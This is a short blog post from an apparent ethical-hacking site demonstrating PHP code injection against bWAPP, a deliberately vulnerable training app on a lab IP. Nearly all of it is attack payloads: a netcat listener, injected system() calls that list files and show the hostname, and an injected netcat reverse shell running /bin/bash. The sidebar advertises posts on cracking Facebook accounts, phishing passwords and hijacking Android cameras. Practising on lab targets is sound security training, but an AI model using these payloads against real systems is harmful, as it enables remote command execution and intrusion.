Ethical Hacking Playground

hacking is curiosity

Search for:

Menu

Home
Resume
Videos
Merch
Bug Bounty

PHP Code Injection

Commands

Listen for a connection


nc -lvp 4444

list the files


http://192.168.20.131/bWAPP/phpi.php?message=system('ls')

view the hostname


http://192.168.20.131/bWAPP/phpi.php?message=system('hostname')

Make a connection to the remote host


http://192.168.20.131/bWAPP/phpi.php?message=system('nc -vn 192.168.20.131 4444 -e /bin/bash')

Demonstration

If you have any questions please comment below.

Share this:

Click to share on Facebook (Opens in new window)
Click to share on LinkedIn (Opens in new window)
Click to share on Twitter (Opens in new window)
Click to print (Opens in new window)

Like this:

Like Loading...

YouTube Channel

Login with Patreon

Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, including how to control cookies, see here: Cookie Policy

Top Posts & Pages

Videos
Extract Email, Phone Numbers of Facebook friends with OSIF Tool | Kali Linux
10 Most Used Black Hat Hacking Tools | Kali Linux
Bruteforcing Facebook Passwords
Phishing For Passwords Using Ngrok & EvilPhisher
Reverse Engineering .NET Applications With DNSpy
How to Crack Facebook Accounts With FBKiller
Stealing WPA Passphrase With Airgeddon Evil Twin AP
How to Hack Android Phones And Active The Camera With Hakku
Tube8 Reflected XSS Hackerone Discolosure

Community

Recent Posts

M4: Bug Bounty | SSRF December 21, 2020
M2: Advanced XSS Techniques! December 21, 2020
M1: Advanced Recon December 21, 2020
M3: Advanced CSRF Techniques!!! December 21, 2020
Check out my Redubble!!! December 21, 2020

Blog Stats

85,608 hits

Write a Comment...

Email (Required)

Name (Required)

Website

Loading Comments...

Comment

×

%d bloggers like this: